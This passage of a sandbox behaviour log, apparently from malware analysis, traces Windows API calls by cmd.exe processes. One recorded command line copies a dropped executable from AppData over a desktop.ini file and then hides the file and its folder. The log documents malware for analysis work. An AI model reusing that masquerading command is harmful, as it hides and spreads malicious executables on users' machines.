lpOverlapped=0x0) returned 1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.411] GetFileType (hFile=0x4c) returned 0x1 [0227.411] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.412] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.412] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.412] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.412] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] GetFileType (hFile=0x4c) returned 0x1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] GetFileType (hFile=0x4c) returned 0x1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] GetFileType (hFile=0x4c) returned 0x1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] GetFileType (hFile=0x4c) returned 0x1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] WriteFile (in: hFile=0x4c, 
lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] GetFileType (hFile=0x4c) returned 0x1 [0227.412] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.412] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] GetFileType (hFile=0x4c) returned 0x1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] GetFileType (hFile=0x4c) returned 0x1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] GetFileType (hFile=0x4c) returned 0x1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.413] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.413] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.413] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0227.413] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] GetFileType (hFile=0x4c) returned 0x1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] GetFileType (hFile=0x4c) returned 0x1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.413] GetFileType (hFile=0x4c) returned 0x1 [0227.413] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] GetFileType (hFile=0x4c) returned 0x1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] GetFileType (hFile=0x4c) returned 0x1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] 
GetFileType (hFile=0x4c) returned 0x1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] GetFileType (hFile=0x4c) returned 0x1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] GetFileType (hFile=0x4c) returned 0x1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.414] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.414] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] GetFileType (hFile=0x4c) returned 0x1 [0227.414] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.414] GetFileType (hFile=0x4c) returned 0x1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | 
out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] GetFileType (hFile=0x4c) returned 0x1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] GetFileType (hFile=0x4c) returned 0x1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] GetFileType (hFile=0x4c) returned 0x1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] GetFileType (hFile=0x4c) returned 0x1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] GetFileType (hFile=0x4c) returned 0x1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, 
lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] GetFileType (hFile=0x4c) returned 0x1 [0227.415] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.415] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.415] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.415] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.416] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0227.416] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.416] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.416] GetFileType (hFile=0x4c) returned 0x1 [0227.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.417] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.417] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.417] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) 
returned 1 [0227.417] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.417] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x32, lpOverlapped=0x0) returned 1 [0227.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.417] GetFileType (hFile=0x4c) returned 0x1 [0227.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.417] GetFileType (hFile=0x4c) returned 0x1 [0227.417] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.417] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x32, lpOverlapped=0x0) returned 1 [0227.417] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.417] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.417] _close (_FileHandle=4) returned 0 [0227.417] FindNextFileW (in: hFindFile=0x320e88, lpFindFileData=0x26f074 | out: lpFindFileData=0x26f074) returned 0 [0227.418] GetLastError () returned 0x12 [0227.418] FindClose (in: hFindFile=0x320e88 | out: hFindFile=0x320e88) returned 1 [0227.418] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0227.419] _close (_FileHandle=3) returned 0 [0227.419] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.419] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0227.419] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.419] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4f41ac | out: lpMode=0x4a4f41ac) returned 1 [0227.419] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.419] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4f41b0 | out: lpMode=0x4a4f41b0) returned 1 [0227.419] SetConsoleInputExeNameW () returned 0x1 [0227.419] GetConsoleOutputCP () returned 0x1b5 [0227.420] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | 
out: lpCPInfo=0x4a4f4260) returned 1 [0227.420] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.420] exit (_Code=0) Process: id = "603" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xea8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34136 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34137 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34138 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34139 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 34140 start_va = 0x4a4d0000 end_va = 0x4a51bfff entry_point = 0x4a4d0000 
region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34141 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34142 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34143 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34144 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 34145 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34190 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34191 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34192 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34193 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 34194 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 34195 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = 
"winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34196 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34197 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34198 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34199 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34200 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34201 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34202 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34203 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34204 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000003d0000" filename = "" Region: id = 34205 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34206 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34207 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 34208 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 34209 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 34210 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 34211 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 34212 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 34213 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 34214 start_va = 0x1320000 end_va = 0x15eefff entry_point = 0x1320000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 835 os_tid = 0xf3c [0227.118] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f9b4 | out: lpSystemTimeAsFileTime=0x26f9b4*(dwLowDateTime=0xbaf07b00, 
dwHighDateTime=0x1d440a9)) [0227.118] GetCurrentProcessId () returned 0xea8 [0227.118] GetCurrentThreadId () returned 0xf3c [0227.119] GetTickCount () returned 0x3ea5e [0227.119] QueryPerformanceCounter (in: lpPerformanceCount=0x26f9ac | out: lpPerformanceCount=0x26f9ac*=28390777526) returned 1 [0227.119] GetModuleHandleA (lpModuleName=0x0) returned 0x4a4d0000 [0227.119] __set_app_type (_Type=0x1) [0227.119] __p__fmode () returned 0x76b331f4 [0227.119] __p__commode () returned 0x76b331fc [0227.119] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4f21a6) returned 0x0 [0227.119] __getmainargs (in: _Argc=0x4a4f4238, _Argv=0x4a4f4240, _Env=0x4a4f423c, _DoWildCard=0, _StartInfo=0x4a4f4140 | out: _Argc=0x4a4f4238, _Argv=0x4a4f4240, _Env=0x4a4f423c) returned 0 [0227.120] GetCurrentThreadId () returned 0xf3c [0227.120] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf3c) returned 0x38 [0227.120] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0227.120] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0227.120] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.120] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0227.120] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f944 | out: phkResult=0x26f944*=0x0) returned 0x2 [0227.120] VirtualQuery (in: lpAddress=0x26f97b, lpBuffer=0x26f914, dwLength=0x1c | out: lpBuffer=0x26f914*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0227.120] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f914, dwLength=0x1c | out: lpBuffer=0x26f914*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 
